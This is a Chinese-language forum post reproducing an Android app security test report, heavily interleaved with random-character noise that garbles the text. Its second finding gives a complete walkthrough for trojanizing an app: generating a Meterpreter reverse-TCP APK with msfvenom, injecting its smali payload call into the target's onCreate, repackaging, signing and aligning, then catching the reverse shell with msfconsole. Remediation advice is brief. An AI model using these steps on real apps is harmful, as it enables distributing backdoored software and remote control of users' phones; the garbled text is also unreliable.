) `( }7 ]: I4 l1 [9 l+ \3 @# l; E9 e( D. n! y H( b+ Y: z, w: y5 @- T* H
; A+ L( b7 A+ N) c4 j; r% \ * j o5 v4 |9 K6 E% v

; S. Q1 n0 G0 w9 G4 M; N. K. q$ J+ m6 x* y/ N   % m( d' {" [* e9 i+ W3 `2 k% u0 E, ?7 |/ ^! k9 m# v

1 I. o& c; k6 |. Y , m& o k8 ~) w3 H7 s

; t6 M7 A$ a4 x: {3 a8 ]7 Q! g# J3 I2 N' m 1-2 测试结果 5 u( q' g% ~9 V; p3 G 8 @2 \' t- A/ W) p7 |' r! b

( }. h/ X* q, W) T/ i4 V + f! m# l9 n+ @0 p# h

" S( y9 W' N1 c# i- K5 d4 v) f/ x, `   0 L, s' A, W5 H9 ~( D% ? ( q7 }1 {, Y( V) C, i

6 k9 K& q3 @: _% Y% N 2 r% B& w3 D0 G( x( a7 c2 `" i

4 x5 [+ X' H& t* b( X. I1 D/ Z6 q7 R* v0 M/ G 2 检测结果                    . G3 I) e5 u% C ) l- S& {7 ^0 i8 {' a

, w) R+ @ I5 p6 [+ Q9 x; |8 e! L3 A' M0 Y" ?- S, z. D

! l/ d, p! F4 j ( E1 w8 M* [' H$ L# v! J' ]7 Q; L' | 2.1 某某某 0 ~7 X' A$ @ v7 J% B: P! J ( O& l. | _: z: e

/ s/ c4 E8 g" Q1 R) U- T5 Z" C' c! n# s( D: t

5 r, G$ C2 l2 Y6 k& \ 0 z( u8 P F' w5 v' U/ X 2.1.1检测目标 4 h: k0 ]1 J1 F8 N- S- e : g0 g/ c! s9 h- A- y" u" O

L0 ]) @* E. @ S: I8 Y " j7 o3 v% l4 [7 s

' E2 }8 F! O1 a3 n+ G# | + L$ p6 ~, c$ W; w: [7 j, o) ] 目标地址: 某某某某某某APP 2 d/ `4 R Q& }$ ~/ D: @: H 2 l9 a4 ]2 d( o

7 M+ |' C9 j2 ? ]7 t6 \ 1 o5 _( v: b& u: [7 U I' |

3 U( k& q% N' W: S" d , _! e" f- E$ w) h8 l" H 2.1.2检测结果 4 G# b p9 r$ v7 F0 f, M( i1 i- c3 D# M! R, }7 ] Q4 D8 u

, }( h. \. g0 K0 [4 l p: B7 k" S! C/ h ' l: V, u2 X/ M0 o8 p* g& Y

' ]4 M1 k8 I7 S3 T1 z3 n. U, }6 A & q x# p* p0 P$ ?+ {: J; P; X 2.1.2.1 ! S5 v9 |0 h$ K) M1 \# f& @* d! j 8 }7 ~# ?$ w, i5 v) D. ~

, a% L' X8 s& W3 W & c! F5 T. q8 L& `( c5 w8 H' l

2 L2 C5 t8 N1 g+ n( Z; E 1 {+ H- _- Y* p* p+ ~& v+ v 漏洞链接地址:某某某某某某APP + T0 k! n9 w, Y. x + P/ d' i5 `" K) _2 p1 r

7 y0 T" M6 c/ ~ u6 m2 n 9 }5 _! Q* o" {+ e2 X6 R$ I

6 _" I( e5 B* x$ k. @6 G8 ~ % G1 |5 I) H$ F5 L* H; l# E   ! J+ Z/ G; }; U# K 7 t0 A( N2 F; D6 B0 Z9 i8 w

& P% {1 E6 J1 n% Q* g1 v( x$ z4 p& o* ~' L; F( O

0 f* F( E# I. Q0 ^* @( l" ` ' T5 L" e" N/ _# c F9 a$ ? 漏洞分析及取证: : X( x2 u- ~$ v( K/ l2 a6 _ 9 j! P: ^/ }& P8 K

' D& n6 j6 i" K4 z" R) g % [0 o8 d& N0 J2 ?

) s, X: | T3 z" q S" }% Y 2 Z4 ^7 X/ ~' e; l/ ^5 Q5 K                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ! k3 X: Q/ f3 i. h r - B3 b3 R( @# T- @( M! ]

$ z1 J* ?, k! O8 B % C3 m* t5 r* P& i: g) ^4 V

0 q% L2 l N! ~8 \: K6 b% ?/ ?" X/ H M: W- Y      ) Y+ |1 m5 g' ?1 i0 r+ I) d 3 L6 G8 ~8 Y/ n; P" q& U

( d* H! p! |9 X5 d; h& d! n/ X6 g+ l4 Q, X# A- N5 T

: q% @! F3 X, b$ F - a y2 _& \/ f6 d& @. y                       0 x% c* |- H) X* |7 n ( `! ^1 E$ O. G/ u" z5 X

8 F3 n3 Z, B( T8 a& l3 R8 a , D0 `( c" A2 j% g

& B0 _6 R& C2 {' l 4 I( d/ l1 U/ [ , k! h, n8 g7 Z & ]6 }# y; Q4 K# H

) p4 l( \: @: C* X& z- w7 n8 D 9 k/ M# r; K2 ^, `8 i# e5 D4 o

, `3 k4 J" a/ X+ k ( J7 f; I5 {- h- s ( M2 h) J c. x' v $ D# z& g, ~. }

! w; [) L3 s5 \' C- J+ Z3 _8 P7 i3 \1 V# Q$ m

" h J0 f6 K5 ~; }# c, s. C0 p0 W: O! f, y$ p % n& q6 O- L: V $ N5 B( c9 z9 K: a# y w! F

. n& i, ~6 H- G+ I% n8 L8 G 0 B0 \- K M* H% x2 `

, t2 N& x2 I( R' Z2 \5 K # `: Z4 z2 r" u0 z d* y 漏洞危害:高 0 K4 j4 F3 U2 c ' G7 {% G( r5 t: z9 w, s

2 a& _1 `5 [( I . [. ~2 p- A5 j3 N
) t6 F D( h% z: {4 B5 R. r3 m) o" t9 s5 ~ 9 S4 ]6 T, N) t! N1 m0 {; D/ T* H; b( F! x/ e! h* z( `* P! a& N: ?. A3 v. T2 e: X- B5 N% n" J( k: v7 D/ U! \4 P' ]0 E; ~2 T$ h0 i" P6 U) Z! i* g: @: q) W* x- ^6 u: ~1 Z/ d" k, U1 ~ A1 l4 N9 T. d1 m7 v* w7 X7 x! J) |1 {" ?5 d2 F4 a- E* Q4 E1 A/ E* D! ]# L- e. C2 ]9 k; q: F4 m3 J' r, Q) n+ ^# ]) g- `( X( r: H: \/ S1 q+ V) {' G% Y& ~& a. J! J# r4 {# f ~! s8 }( |" S! X# L) V* M% |3 D9 T" r7 j0 f8 \! p3 R$ ~; ^' o/ t9 n; K1 U3 c8 d& @- n- J5 W3 `$ J; \& [0 l, A; p6 q% h a- Z/ b4 g$ f( U2 ]: @# n5 b, H& S: b1 F$ e7 U% s% S/ ?$ D$ K- }0 O' V, _9 W9 Z! A$ Q: \9 Z1 w7 |8 f2 Y4 g$ O
3 D! m8 E8 L3 k8 H6 P2 ]3 h; v5 u1 p& r& g4 S9 y; j/ o) a' m" B

' p% D- B* N- |% F9 i" n# n& L, w7 q$ e6 U# [4 o) G 严重程度 $ X. D3 j& m9 l6 y# [ 0 t5 H$ K+ A R/ b5 Q/ _1 z

- n5 q5 |, @8 @2 I1 G) y( Y / G1 Q7 n$ b2 [4 Z" @ 		# b3 T' [4 ]1 u- j$ X; W# { 2 j& B* n( e& P1 z* T) S

" B0 R) P2 n, u2 {$ l / u9 M) X! c- h! P7 [- u4 L : j+ o- S# _& q( _" x, c: J, |7 T" x4 _5 S

, v' M+ S* r' S/ D. L, X$ o# L , P/ c/ p, S( f) g% Q 		/ h5 J' K+ G1 i( Q& D ; e8 s* D% O3 p* a H& @, |; @5 s& g

$ J5 b* v0 `8 t 7 y& r) D9 Z& t+ q9 k " V# N+ r' t o+ a7 [3 { B6 t: i% n+ K4 P6 O" n

% m1 V& G8 K; R* `1 U , X. R' u, w: F) Q: M 		8 W. ^2 J' l @6 ^ 6 Z2 j5 F- C f. \, `; K( i

9 ?: P2 m; P5 s ( y3 i% N- V: @* b 6 O3 B2 y- |1 j$ E& k* v9 ~! I % m3 T. S8 [( t7 N1 _

6 P: k8 W6 a) n9 i6 s, A# h+ M- A4 i: U 		2 D* H/ G$ T$ H# W ?6 [ 9 ?8 t0 K" @7 N" X+ b+ C; `

# L" z; I8 B0 Z, m. \, M7 p ^; T$ W* [ + o, X0 `& _' e* h- y/ W   ' F, B! C5 {) _% L , ~% e; g& J7 u: i6 w: X

3 ^. I& h* D4 p - H# ~- l% U* L4 u 		4 i! e% V9 h2 j) j7 M7 T # Z* c. _8 U) `1 U4 }

' L/ ~! r3 e, E: x3 v, m6 w$ ?; N9 ~ R, c/ F! Z$ `1 w 1 b0 @+ k- t0 `4 V6 M4 P " b8 Q, E9 H6 ?) d7 w

( j1 A0 ?9 `. G* p }5 F. t 8 N: a# ^* v' B. b+ P 		$ W6 A/ ^3 J5 E6 q/ }. n0 c 1 Y9 C) r+ I. v0 y! Y! G( v. {

C. S: j7 j- R- X4 w 1 V& J0 y' W: }: c' q   # j& x. {! ]8 C( L& W" q+ ?, z/ F/ [+ w- w+ `

2 H; E1 R) n; j- W: i" d/ Z ' e5 _- z/ x3 _) ^7 J! @
* d! N$ D0 u+ Y* z . ~$ ]/ E" H$ n" p2 y
" u" b7 X$ i: t3 Q, r: d; n 4 L4 K m4 A* { Y# n! W& D4 X" l

4 Z0 E: ?) s) ~( G% m0 p4 e* W4 U' m6 }   - K, w6 K9 h, x L0 T, `3 d . R5 S; h! o# ]' A3 ~0 n

% ^% p; W$ |3 T% T/ D 3 `7 Y& N, s' N7 E' u0 A

3 P3 x) l8 ]/ f 2 V) a x4 s4 q* x3 l 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ) s7 x( k0 [6 T+ q & }! W. P3 Z( ~) R; s" k" e

. L, M) |* A' N6 v5 a1 G$ Z- |. K + z% ~) [' P/ F$ ~% ^( }* e3 Z& r

( x/ e( Z: u# ?, E' D9 e* C9 |$ M, e, E( l* I( z) m4 j% Z% g- O           - O$ c4 v K* P: J1 ]' w / S5 W! t; h9 v' I# P1 P% w2 \

9 A' L0 \4 B9 B( }$ f & D' {6 V, Z- ]

* J8 O0 m; V' D ) _( v( u, P0 i5 C& b) w. P   & e0 w0 y9 z% g" T- ~& y1 \ ( t" n" h) I8 C- `0 ?! l' w

5 |& w/ k w) b! E. o % ]; \: B/ {2 p/ z. A5 F0 L

3 k3 ^7 a7 U. r. D' k2 V: P2 i3 C& b. N 2.1.2.2 % s+ t, B- o' c( U1 _# { * T) F) _+ ?9 _

2 Q; l' _2 c' b( o9 ^1 } 0 v! S; ^ G5 C- v; }

! t0 C1 G! \# G/ Z4 F& M2 ] m! L' |+ X- V8 k, Y7 @' b/ K- b 漏洞链接地址:某某某某某某APP ' W( }( M6 }, }8 h$ ]+ l$ [2 | T' ^4 t5 ^4 A0 i0 |* y i% X

: q7 q; L5 z0 q# @ * D# d x' S% m) W

1 Y% u5 Y1 b+ F" D4 y( W* L8 O7 P, V: r9 B' r 漏洞分析及取证: ; r- B7 |7 ?. H& \' T, s# U' W 6 v: c2 K4 P* {: j Y

* A' P8 A2 \6 b, ]% k( h9 f5 ]/ I- e8 W5 I8 e2 v8 L* h

% |6 f: `; P/ x2 l/ x , v4 [2 K" _2 B. r                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: , d" G3 r# Y2 g& C2 f5 q0 i( T* H2 y2 _

]8 N0 r9 m/ J; C$ Y! _! B% u* t ?6 x* S' }- X: K

* s- j! X! W8 g" N% K( B6 d& J, D# X3 H4 s8 a0 |8 i Metasploit 生成木马 apk 4 F7 N, m* A. ~) L) q+ n1 d. @ ! s w( J" X2 |5 \, z- `# S7 k8 h6 t. r

, B. C! i1 F u( A* s / x: _- p' g8 n6 \% d3 }

" ]% _) z8 s1 \& W( ]) p8 v 5 ^) C8 `, v, m9 o5 I2 F msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ' i8 @- ^# v: d, g Z* R2 t 7 y6 ?# W: o0 N8 L

* X! ^4 C5 x0 D; ]) F 1 g: P9 N; e, Q3 s! K/ X* C' \

! m3 A$ p7 _- \ |( @ " ?1 V% T; ^) ]5 ~* f& Q 反编译目标apk和木马apk 8 `5 K3 G) n c, X+ C% ]. q; k5 C + H1 d- E. F! _* y

8 I4 v! b g; t% m1 u5 t# I- s 5 p* G( K4 w" L1 m3 d0 p

$ E# X5 @3 v; e# ]# d4 F$ d" i" Y2 t8 ^7 [# q' h apktool d target.apk
, {, R2 Z0 \8 w6 t- q* c& T4 w# d5 g apktool d cockhorse.apk , ]; ~5 @+ A( c4 \ * r( v0 U+ n% @6 r9 o$ h9 [3 `: S, U

( C/ J4 {& \3 J. I n 0 @% o$ \& I2 c0 a- y

8 @% P* o' f% a, J+ w4 A; ?( [ 9 D* i' w7 W+ j' E6 M' J 木马 apk 注入目标 apk / o. T/ M5 A) R* t , f$ g2 Y$ \6 t9 Y5 Y4 y+ _

2 d* h* r Y. d1 @2 B ( j/ x. X- e# c! T

+ j0 ?3 }6 z# h# E6 W - c) ?" C& i$ Q- b. O1 N' y 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
0 t8 r; ] i2 S2 @1 l: Z$ v4 n" N K! x+ ?* q5 {+ d: y invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V % q: ?9 e; H7 Z! a! h5 A. l3 M4 O ( N5 m n5 n* j0 K0 ~ Q9 m5 A) c" K1 g

7 \! }# y" q# z0 s8 p8 S0 ?6 `! F2 Q" U) e( C

; p$ R! u: o4 g; @8 h. t, ~7 R. _4 S3 L4 D+ l# l" h 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 5 l* m2 r+ L$ o5 j+ v4 J% B" q9 a! @/ ~ h3 l* t0 O3 F

# r% P3 i. h4 Z! h3 }7 @* F3 {( }! H. B! Z/ Y4 i7 H

6 ~4 d# H8 R% D* ^* b# N & i7 b. i( A; L2 } 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ : p* [6 q: v# R. j' ? 8 ^- C9 p; c9 s9 z4 n& p

" L8 j! X# G+ \$ l0 a' \$ d 2 _' K& g8 N) q: ?

/ M4 q8 r4 a" M2 K" ?! p) v. C3 F3 A/ u 回编译生成最终 apk 9 r' r1 c5 Q7 n6 y/ ^6 b 4 Y4 x* R& H+ T6 }3 U3 J, Q( S" o

1 o" W# r; i: K1 R3 o 5 V& s7 }8 u% [

1 N5 W1 w4 W# j: b , R& Y9 r1 i5 r4 r A8 C: T 重新打包 7 I+ ^: i1 z& b$ `7 C: j7 P) h 5 ^' S. h: Y# F# n7 @

_3 B1 M; _" a. p9 \4 k5 n( d/ q% |/ c ^- o9 y

& Y) c2 S! ^, F6 I ) u3 E/ N( J: q6 H4 p apktool b -o repackage.apk target_app_floder / u0 O) O' I% ]$ t 4 c& x5 A3 w+ }1 `4 S! C

$ {; P* Q% U% K4 \5 h$ D8 Z. X7 | / m" |2 d2 B# a( @+ a

( V* }0 b- ~7 c, E9 w' V , u( I( ^: h8 N1 ^1 M- m' s' w+ Y 创建签名文件,有的话可忽略此步骤 ; Z, }" S8 a" | t K8 w6 k, M+ T3 h) E- E& X8 Z

" i, s5 s# J8 x) a0 W- z4 C0 K / ^% B3 y `" s$ n8 o) X/ ~

/ [1 X" q1 @, D* s7 e+ k8 {( k8 c# }- f; g3 N keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                . P5 J4 P* M+ [( q 2 ], i2 f' y2 Z/ ~' v K# t8 i

3 J9 q( m3 k5 i9 G. l- U 1 @$ m9 {; _1 T, Y

$ z1 d# E6 G, f m, _& T# ~ / j! E, F+ d/ T5 ^9 k" s 签名,以下任选其一 & W+ _4 k5 O# R! G # V- B- U# v' g( i

: \1 c, M! t9 I ' t3 E1 ~. b+ M& @

/ c- N1 c) K5 K0 u! _7 G 4 T0 t; K4 ?8 C) T W jarsigner 方式 ; W% t; E, {" D; P* |( D4 y, z 8 e: h7 c$ w n) [2 z% ]- e; c

% v g- _' _- |1 {0 t 6 o* k: S. S5 w

( `4 R0 J: Z; ?* z3 n- N t/ N- z & L: L4 M% J1 P1 L jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 2 I1 W( s- G4 ]; \0 M $ z# V/ R# I- P5 C

3 `2 _3 u! \: m8 y: \" d0 b7 \% a 1 o+ I6 T9 l% ~& {2 T

5 l/ R3 w. t$ ?* I0 W% [* B : y: J8 U, w7 I' p/ @7 ] apksigner 方式 1 h; M' P& g! X& k; G7 S & N# F& y$ w) a' s- T C! J+ z

0 W5 \" O8 Z! Q* D2 R/ o. H6 \; }( {

* u+ e1 v$ l9 G. m6 Y% g 0 l( u" U D% k+ j4 T; ? apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 m8 ]+ l- R# ?2 d7 S: N$ m5 ?( f; A6 d

: Y& ~+ a( _! J% t* H5 v! o. W 5 s- W4 O% f/ t3 u' }1 P j5 ]2 G# }

6 b2 b6 x0 z/ r5 H) g1 ] / W( \7 x9 m; @7 M7 L 如需要禁用 v2签名 添加选项--v2-signing-enabled false + ]$ W% H" U7 i. s) p' k6 b ( w$ w7 c# h4 A. R1 _ {" ~! A

; e" E% A% C1 X3 Q) F ! w9 M6 f( b1 W0 C

: p6 M" i( D# \2 ?" L) } 1 O% I2 ] l$ ?% \ 验证,以下任选其一 " y* u+ r7 ]8 T4 ]! j ) k. R9 U$ `$ h1 s5 ~

# j* R; H D' i9 U! ^( { m! ~ - w+ G' i- u6 B5 m4 j- ?8 `- m- S

' j( ^8 ~: r$ s5 }# t |8 C2 ^- o 7 s! \" r" J1 K7 u0 w1 a' { jarsigner方式 3 n$ F4 m- q7 q* v P: M K + ?: C8 w5 V. u' V% @. q! w

/ H& |( R0 u" ~1 ~8 D ( v0 C- i) [2 l* f/ Y% s( u

6 I$ x+ h v; r- C) h, O : |; [% P7 U5 x+ u' w4 S jarsigner -verify repackaged.apk . G. \$ E/ ^& `2 t, ~ V7 ]" C2 s. N, a) @) }# l' [5 c

; e6 T# p7 D4 U- x3 q6 U h+ [/ ?. o: B" O6 X4 S9 y) L

6 g& a& N" Z, j3 |4 O N7 ?! y 1 z) X% K4 ?* F, y! W/ {1 g apksigner 方式 + W! D# T' L: W1 F+ C ! Q! [- m: J- ~ D4 U) l

/ C) |; v; v% Q+ l+ y1 m6 ?# J * l4 W* s3 f" ~

7 T$ C; a" C" k( g" N j ) o. j" A8 @# r apksigner verify -v --print-certs repackaged.apk ( J2 Q. j: t# W$ {' J7 \. e l! j: @, F/ J- a

: V! N( b4 C7 b) c4 t9 _ 6 o/ x% V, k# M9 [; o' k: l

" f/ D) b$ ^7 _3 t X 4 G& |; z4 z* A* `( U keytool方式 ' Z# p- l! j) |- j) S. y) q, G # ], g7 U8 T* z* C. x5 C

# W0 q6 q0 X1 Z8 H: J6 U) j; }6 ^' a' f7 i

( T0 h3 N! E1 F& T% L& U: Y. ? ' X6 \- g$ ?! `2 i1 M# p2 e' ? keytool -printcert -jarfile repackaged.apk / y; Q5 i H$ H2 o8 z ! w5 {/ v1 r+ [5 B' J. i# Q

6 D7 s2 w4 M6 O0 ]" N# I- P- i! l& [2 ` M+ x, \ S

! k3 w+ E! G7 n# n! K( @ ' @3 P, X4 V$ I+ _2 q( y( g 对齐 5 f& v. ^/ h9 j; u $ Y& x% K: |- n' X

& S. T) ~% w) c8 L7 I: V, e: u3 f) \2 X; D# B: _

; i! d& } M: ?* q 4 n# o7 \( @& w# |. a) H 字节对齐优化 ) e& I# N! A$ I" w& O ; Z) y6 f% i8 n: P# p

' r: ~1 a" r& c9 e; w 8 ?) X. I0 J0 \( g

2 j) |" o* H1 E ) h+ I3 u) e* C- j, |1 e zipalign -v 4 repackaged.apk final.apk , v) J: A2 L! ]- C N. | v: a1 p/ o4 p) o* @, Z; j# e

5 n9 R( r* [: C* {- Z0 T' d3 ? 3 _0 E+ e1 Q) f" H: U0 [

& l- q* `5 ]( N" ~& S 8 U2 H* X6 H' d0 M 检查是否对齐 4 Z* ^7 x) \7 s' |8 ~. B$ u \- Q9 S' b! \( k1 Z( U

& L# |1 c/ A/ p5 ?0 W# B* v* `% t+ A9 P

3 i- G7 E) V2 t% O+ ? Q; U 6 Z5 t. P- a: D7 ?, G zipalign -c -v 4 final.apk & F" F$ r, |, \' ^ & |1 P& K9 }: K2 \" e+ k2 { u9 `

1 T% y6 {4 R0 r a ( R2 n# w( e% ~& }$ u4 c

4 T& r: G8 O( [. z0 T 7 F8 r, q0 i/ r. I+ W1 V 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + Q o8 [* w4 M' R; J c$ L0 ^# g3 ^) F7 u

1 Z* i4 E% R2 k% S) q& S / u! X* l, y7 S$ E

y( b5 p4 @9 K" P8 Z: m " f) r0 U1 S7 d& Y* @4 V 启动Metasploit控制台,配置参数等待上线 ( `& J" d* w- h) H8 k# q 1 f/ W1 U/ n* l5 |0 C- P0 E+ x5 O- j

7 X& G# ~8 | V" G+ \! ~# Q$ P" ~7 m7 u, D7 ^' ^7 K. u# H1 W6 Y

p, } u- ?: _: d6 d% g- v$ w5 e9 e& h2 Q3 T 在终端依次输入如下命令 {, D' J7 r0 |' V% A 2 f1 P2 ~* x( `5 ?! N7 U0 T: t

+ q4 A: t- M0 |" w- F $ S* a' \7 S* ^0 I9 Q" {

) T2 w/ j2 A3 Q- `0 u* V/ o4 s, w1 }% J1 o5 J! P) s* M msfconsole 0 W) L- }% N% w : N6 I8 W: q$ [9 m

+ ~+ f, [ G$ q, z0 ^$ o* k8 s# `$ {& ^- ?7 y$ \7 h6 F

5 F/ s1 y' S! D$ \( [) t% j- o8 j A- `" n! l R0 m use exploit/multi/handler 1 _$ ^* O4 J; ~3 U ; U! Y1 j. p% C3 Q% J8 h4 x

( f+ p* T. V$ S" W( m7 h, K3 a1 e3 i/ z& S6 q8 z

' {; {- E/ D, b/ K' Y: \7 ~2 X& O 0 }% P# T0 r7 w3 ~ set PAYLOAD android/meterpreter/reverse_tcp ! x* S3 c/ e7 V% k/ B0 Q0 p2 G% I0 j* w2 A. h! O0 p

/ h7 L9 j/ a& V5 O9 l / e, O O( B1 z2 p3 a9 N

$ [! C8 L% D% [/ Z3 X7 W! E 7 }: X4 k) Q G% @4 C set LHOST 192.xxx.xx.xx ! o# E. `* v$ x- E2 f( T8 g1 [+ f& j+ l8 H; Y

/ `' }- l) A' d4 i# O) b( L8 Q/ b& M5 k0 |' Y3 T0 ]! m% [

6 ]; j( r( u. e8 ?" s ) b6 D# d! L& j e% D set LPORT 4444 % n3 p3 `! I3 |/ y: [2 e4 s 4 X# P0 k' L5 s9 G

$ C% N( e# K1 t$ ^: d3 f: H. S 3 A4 R# m |' k

2 G+ b, G3 F7 G8 F' r ; J( q$ M ~6 x, t* l exploit / B* {" o) S, K1 |) \3 M A1 E' E9 x. H9 ~

+ |, K1 g( |! }7 c* Z: h 7 W3 d9 N$ q4 ]* `& a& r) ]$ H4 m

4 ^: w+ `# {% q& \ 9 ^5 `3 V) k/ |/ B 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ' Q9 w% ]# i( Y: ]5 \$ U& f n* k" Q, @6 k Z$ C8 U$ }

- E/ L$ l4 V7 F& r1 R# V% }$ r0 h! P9 h4 ~3 Z0 w" B

$ }+ ?# _% `% h' x$ I+ d. F9 K2 j- L0 Z, H: d$ V, j0 | 漏洞危害:中 ; J7 A" ^) H3 H/ Q- h1 |/ ` ( b$ V8 u& M: v" K

' E0 i) Y+ m; i! D5 Y4 C. w8 h$ o- L5 c: [+ f* s
% [( w) S" e, X 9 U' C* h! a6 x& Q! m4 ` k7 q- z5 f2 f& q8 r( V 8 }- \- I$ y" q* q1 i- Q4 D A7 P+ T 5 T. s: W5 G4 L( e( b2 m% X+ h- {6 o' U0 b6 L9 p+ y/ P: R \0 A/ ^; N8 h* c" }( ~4 D7 H4 r) b, h' V `5 Z. w- z0 a* {; h1 }! m3 l0 q) y% q1 G9 `* `2 L/ x( w! d2 X2 L- o. Y( v! _ a) c9 o- m4 [) \% C$ j, B. i2 I1 Q- A, ?$ H! H3 q! q# \( G$ t2 Z7 \" V5 F5 D2 G0 N/ J& L$ [4 h) M1 m; Y" f4 g3 ^8 b. U9 s1 p% d7 \+ Q7 [: B# S9 e2 y* h# E( Y. S. G3 C3 F) Z7 J# d1 x" {, R G3 |$ b5 \' ]5 `! o; c" s5 P( E! K8 x' _! l/ o5 J! x$ H+ C4 l, X9 X+ ?8 A/ \% e% G0 l' ~$ Z- Q5 P0 h% g4 o& ?" ~0 p, ] d2 {7 d9 w5 e( X' p1 ]1 ]' K$ x: L4 l8 H0 I7 c* E: ~
h& ?8 T8 X) f , ~6 G/ F# P, _' S! Z9 q' |4 N ^

* }0 K) v# o- y9 t0 @7 ` / f9 X; |3 G8 g$ \% f 严重程度 + w" R) k) R- F9 K4 N& e ' C! f* t! K$ T# c) L. X

1 o* z' ~: }7 c0 s! l* y0 Y5 z 2 u* O3 Q0 T) B; U2 r 		5 M$ ?5 F* }7 T ( U# n r: L5 ?' W1 w" s9 ]+ V

1 l7 g2 d1 O# f' a 9 i8 o5 t# ~2 Y g8 }8 I % d7 A* T/ X5 E) ]* L; Z T * W) s' ` y# P3 X, S+ d' f! ~- ~6 A* N

* v% r/ p6 s( g8 S) t $ p* ]& {# z3 C1 [6 C 		" K+ l. s- {1 S* e$ ^# n & ]: E5 {. E$ Z4 M% f- ]" t

+ @# A1 z/ Y8 m% R! i / m2 M8 N. D2 _$ a- C / z& x4 B( L; D I ( A5 O# X% g/ ^

! T, p# Q5 B, ~3 k7 n+ N# M . |7 v; Z5 n2 d2 Y 		0 t" a9 u. n; j' X0 C; \ . L; {- O: g5 P

: h( N; a, v/ w * G) B( }6 n. ^! l + v/ W( b( J0 L% H ; Q# d7 l& y4 z; x' X1 C

4 d+ N8 l+ E; b * `2 {+ _2 z* f! m9 E) J 		$ ^! m/ j2 G1 N0 [! B / T+ v4 ]9 Q7 ^) J4 s6 j 6 ^+ `3 N3 j( F/ q 0 P/ f* d9 C- r9 X0 B

- B4 S. y! R( F. ^; {+ }7 s Z l5 \; n3 X! `. r1 d   ' \9 Y0 ^, o- B7 Y : i, t( A% W$ D8 }0 c1 `" S

8 [5 e% s$ K! c7 N % R8 W; c- J9 l7 [7 I 		1 k6 Z& t- {9 z6 S3 v9 ]4 F* U+ h8 s3 ]5 k. V2 {* x0 c

1 y& t# h6 w) [ ( q; h$ d. k0 s z9 V H+ p' ~$ @' A( K7 q- R% e: d 3 }3 G2 E& {$ s3 P, [/ K

. {6 c8 m# o$ V( w! B4 [: Q : [& l' ^7 b* T" l1 ? 		% r: w, ^8 u+ P+ N2 Y 7 l9 N7 d, c& T9 V9 r + s B ~6 V# W3 q W" `$ ? K+ F& ^/ Z+ E$ K3 u5 f* X

" G) b4 m. Q ^# |2 B8 X 3 b, x7 C' O: B `/ g8 r   - n2 S' d1 _- Q- D/ O 5 u0 ~# t; j: ~

& t' l( M) Z4 ~& ~6 b- f* C0 v9 F# } # ~( B; n$ F P% y* x0 R
# {& f" V' q% u 3 C; \: H3 n+ Y5 k2 ^$ S7 x
- x( [4 |% ^' h- y& G8 A 9 v1 i: D3 U- B2 r, c. ^5 j& B

6 c. Y6 D1 f9 z! _' c6 v/ r( T! I( O7 F3 ^+ c; l" D   / {- D0 e0 [1 b1 V' R# y $ `4 {7 Y) L3 N7 [$ L% p

& j% Z( R, s, w1 B; ] 7 ~, \) ?) O e3 r- J) I/ s8 C

: {7 ^3 c2 d) @( R , k- g; P' R1 } 修复方法: / D" m) J0 A9 } t1 B # O7 g) e% M4 e& M) b

4 u: C: S- b$ M. z' t7 q5 k# | ( b6 A* X3 C1 q G: B& X8 k2 q0 P

$ s4 M8 }' U. I# A% U & o5 ~0 }9 b, i! w" y+ b               1. APP 启动时应做签名校验防止二次打包。
& [' j7 m5 a1 G5 H B$ Z' [/ r I* q2 j& L a/ Q8 p 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 - x a M8 i) j0 M & C! @' Q& Q# K7 @

( E7 Q A" n6 d8 l: Q' i; r 1 j* `, S, c# I* H r% M) Z % l) H/ t7 T* Z8 I2 k% e4 r & o/ k# N: J) F- X' B: M6 U

8 n0 {; _4 b3 h, e" b. x& ]8 v7 \$ l: |& ?( ?: k   4 A! a6 ]" j. O3 g; @5 p7 J8 x4 M# e8 t( {) `, q

! f! S4 g& W- f F! N + B: _5 b2 J* W' r! T 3 |- Y2 N+ |6 ], ^' M$ U1 B" W* \) \ & q2 n* T$ B) T3 D" U

# ~8 o: o$ A' L; I, ~ : \# e& z: X- E& N8 C: N
; U# h; C9 }4 b; ^& q4 Q! n% k$ [3 X5 @2 p) r

' d3 R1 V, ?: Z' E6 q & ~" {+ x7 _! V9 D, s f
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表